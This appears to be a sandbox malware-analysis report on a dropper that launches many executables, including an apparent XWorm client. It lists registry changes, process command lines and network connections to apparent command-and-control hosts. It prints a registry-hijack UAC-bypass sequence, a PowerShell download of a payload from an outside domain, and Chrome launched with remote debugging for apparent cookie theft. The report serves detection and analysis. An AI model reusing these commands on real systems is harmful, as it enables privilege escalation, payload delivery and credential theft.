| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
"C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
"C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe"
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7828.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7828.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\7828.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1431.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1431.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\1431.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9471.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9471.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\cmd.exe
/c del /f C:\Users\Admin\AppData\Local\Temp\9471.vbs
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
"C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
"C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
"C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2672 -s 600
C:\Users\Admin\AppData\Local\Temp\a\test12.exe
"C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
C:\Users\Admin\AppData\Local\Temp\a\test6.exe
"C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
C:\Users\Admin\AppData\Local\Temp\a\test14.exe
"C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
"C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
C:\Users\Admin\AppData\Local\Temp\a\test9.exe
"C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
"C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
C:\Users\Admin\AppData\Local\Temp\a\test19.exe
"C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
C:\Users\Admin\AppData\Local\Temp\a\test10.exe
"C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
"C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
C:\Users\Admin\AppData\Local\Temp\a\test23.exe
"C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feefcf9758,0x7feefcf9768,0x7feefcf9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\a\test5.exe
"C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2292 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\a\test11.exe
"C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=976 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1308 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\a\test20.exe
"C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
"C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
C:\Users\Admin\AppData\Local\Temp\a\test16.exe
"C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 --field-trial-handle=1296,i,3620664578605470210,16291612609235633639,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\test13.exe
"C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
"C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
C:\Users\Admin\AppData\Local\Temp\a\test15.exe
"C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
C:\Users\Admin\AppData\Local\Temp\a\test18.exe
"C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
C:\Users\Admin\AppData\Local\Temp\a\test21.exe
"C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
C:\Users\Admin\AppData\Local\Temp\a\test22.exe
"C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
C:\Users\Admin\AppData\Local\Temp\a\test8.exe
"C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
C:\Users\Admin\AppData\Local\Temp\a\test7.exe
"C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
C:\Users\Admin\AppData\Local\Temp\a\test-again.exe
"C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"
C:\Users\Admin\AppData\Local\Temp\a\test17.exe
"C:\Users\Admin\AppData\Local\Temp\a\test17.exe"
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
"C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
C:\Users\Admin\AppData\Local\Temp\a\win.exe
"C:\Users\Admin\AppData\Local\Temp\a\win.exe"
C:\Windows\SysWOW64\route.exe
route print
C:\Windows\SysWOW64\arp.exe
arp -a 10.127.0.1
C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe
"C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | beastsband.com | udp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| AT | 185.244.212.106:2227 | tcp | |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 85.209.133.150:4444 | beastsband.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 68.178.207.33:7000 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | 95.217.24.53 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| FI | 95.217.24.53:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| GB | 103.192.179.31:80 | 103.192.179.31 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | push-hook.cyou | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.21.10.6:443 | push-hook.cyou | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| US | 8.8.8.8:53 | blade-govern.sbs | udp |
| US | 104.21.80.208:443 | blade-govern.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.24.53:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | story-tense-faz.sbs | udp |
| US | 172.67.151.225:443 | story-tense-faz.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | wdearas.liveya.org | udp |
| HK | 103.135.101.188:1930 | wdearas.liveya.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.25.143:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
